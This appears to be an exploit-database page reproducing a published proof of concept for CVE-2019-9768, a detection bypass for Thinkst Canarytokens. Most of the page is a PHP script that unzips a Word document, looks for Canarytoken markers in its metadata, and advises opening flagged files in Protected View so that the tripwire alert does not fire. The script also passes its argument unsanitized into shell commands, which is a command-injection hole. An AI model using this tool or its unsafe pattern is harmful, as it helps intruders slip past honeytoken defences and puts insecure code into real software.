Canarytokens 2019-03-01 Detection Bypass

🗓️ 21 Mar 2019 00:00:00Reported by Gionathan RealeType

packetstorm🔗 packetstormsecurity.com👁 45 Views

Canarytokens 2019-03-01 Detection Bypass exploi

Reporter	Title	Published	Views	Family All 6
0day.today	Canarytokens 2019-03-01 - Detection Bypass Exploit	24 Mar 201900:00	–	zdt
Circl	CVE-2019-9768	24 Mar 201913:37	–	circl
CVE	CVE-2019-9768	14 Mar 201907:00	–	cve
Cvelist	CVE-2019-9768	14 Mar 201907:00	–	cvelist
NVD	CVE-2019-9768	14 Mar 201909:29	–	nvd
Prion	Improper access control	14 Mar 201909:29	–	prion

`## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass  
# Date: 20.03.2019  
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale   
# Vendor Homepage: https://thinkst.com/  
# Version: up to 2019-03-01  
# Software Link: https://github.com/thinkst/canarytokens  
# Google Dork: N/A   
# CVE: 2019-9768   
#==================================================================================================================================================================================  
# PoC:  
#  
#  
#  
# Requires unzip:  
#  
# sudo apt-get install unzip  
#  
#  
  
  
<?php  
  
system('unzip ' . $argv[1] . '.docx');  
  
system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');  
  
$strFile = file_get_contents("docProps/core.xml");  
  
if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )  
{  
echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";  
}  
else  
{  
echo "Should be safe to open normally";  
}  
?>  
  
`

21 Mar 2019 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.30723